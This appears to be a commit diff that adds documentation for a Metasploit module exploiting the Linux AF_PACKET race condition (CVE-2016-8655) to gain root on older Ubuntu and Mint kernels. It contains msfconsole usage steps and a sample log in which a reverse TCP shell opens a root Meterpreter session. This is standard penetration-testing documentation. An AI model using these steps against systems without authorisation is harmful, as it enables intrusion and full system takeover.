|
| 1 | +## Description |
| 2 | + |
| 3 | + This module exploits a race condition and use-after-free in the |
| 4 | + `packet_set_ring` function in `net/packet/af_packet.c` (`AF_PACKET`) in |
| 5 | + the Linux kernel to execute code as `root` (CVE-2016-8655). |
| 6 | + |
| 7 | + The bug was initially introduced in 2011 and patched in 2016 in version |
| 8 | + 4.4.0-53.74, potentially affecting a large number of kernels; however |
| 9 | + this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels |
| 10 | + 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as |
| 11 | + Linux Mint. |
| 12 | + |
| 13 | + The target system must have unprivileged user namespaces enabled and |
| 14 | + two or more CPU cores. |
| 15 | + |
| 16 | + Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation |
| 17 | + may crash the kernel. |
| 18 | + |
| 19 | + |
| 20 | +## Vulnerable Application |
| 21 | + |
| 22 | + This module has been tested successfully on: |
| 23 | + |
| 24 | + * Linux Mint 17.3 (x86_64) |
| 25 | + * Linux Mint 18 (x86_64) |
| 26 | + * Ubuntu 16.04.2 (x86_64) |
| 27 | + |
| 28 | + With kernel versions: |
| 29 | + |
| 30 | + * 4.4.0-45-generic |
| 31 | + * 4.4.0-51-generic |
| 32 | + |
| 33 | + |
| 34 | +## Verification Steps |
| 35 | + |
| 36 | + 1. Start `msfconsole` |
| 37 | + 2. Get a session |
| 38 | + 3. `use exploit/linux/local/af_packet_chocobo_root_priv_esc` |
| 39 | + 4. `set SESSION [SESSION]` |
| 40 | + 5. `check` |
| 41 | + 6. `run` |
| 42 | + 7. You should get a new *root* session |
| 43 | + |
| 44 | + |
| 45 | +## Options |
| 46 | + |
| 47 | + **SESSION** |
| 48 | + |
| 49 | + Which session to use, which can be viewed with `sessions` |
| 50 | + |
| 51 | + **WritableDir** |
| 52 | + |
| 53 | + A writable directory file system path. (default: `/tmp`) |
| 54 | + |
| 55 | + **TIMEOUT** |
| 56 | + |
| 57 | + Race timeout (seconds). (default: `600`) |
| 58 | + |
| 59 | + **COMPILE** |
| 60 | + |
| 61 | + Options: `Auto` `True` `False` (default: `Auto`) |
| 62 | + |
| 63 | + Whether the exploit should be live compiled with `gcc` on the target system, |
| 64 | + or uploaded as a pre-compiled binary. |
| 65 | + |
| 66 | + `Auto` will first determine if `gcc` is installed to compile live on the system, |
| 67 | + and fall back to uploading a pre-compiled binary. |
| 68 | + |
| 69 | + |
| 70 | +## Scenarios |
| 71 | + |
| 72 | + ``` |
| 73 | + [*] Started reverse TCP handler on 172.16.191.188:4444 |
| 74 | + [*] Writing '/tmp/.iDLrwN3S4.c' (24885 bytes) ... |
| 75 | + [*] Writing '/tmp/.rMIvkKT' (207 bytes) ... |
| 76 | + [*] Launching exploit (Timeout: 600)... |
| 77 | + [*] Sending stage (853256 bytes) to 172.16.191.209 |
| 78 | + [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.209:38530) at 2018-05-07 03:07:21 -0400 |
| 79 | + [+] Deleted /tmp/.iDLrwN3S4.c |
| 80 | + [+] Deleted /tmp/.iDLrwN3S4 |
| 81 | + [+] Deleted /tmp/.rMIvkKT |
| 82 | +
|
| 83 | + meterpreter > getuid |
| 84 | + Server username: uid=0, gid=0, euid=0, egid=0 |
| 85 | + meterpreter > sysinfo |
| 86 | + Computer : 172.16.191.209 |
| 87 | + OS : Ubuntu 16.04 (Linux 4.4.0-51-generic) |
| 88 | + Architecture : x64 |
| 89 | + BuildTuple : i486-linux-musl |
| 90 | + Meterpreter : x86/linux |
| 91 | + meterpreter > |
| 92 | + ``` |
| 93 | + |
0 commit comments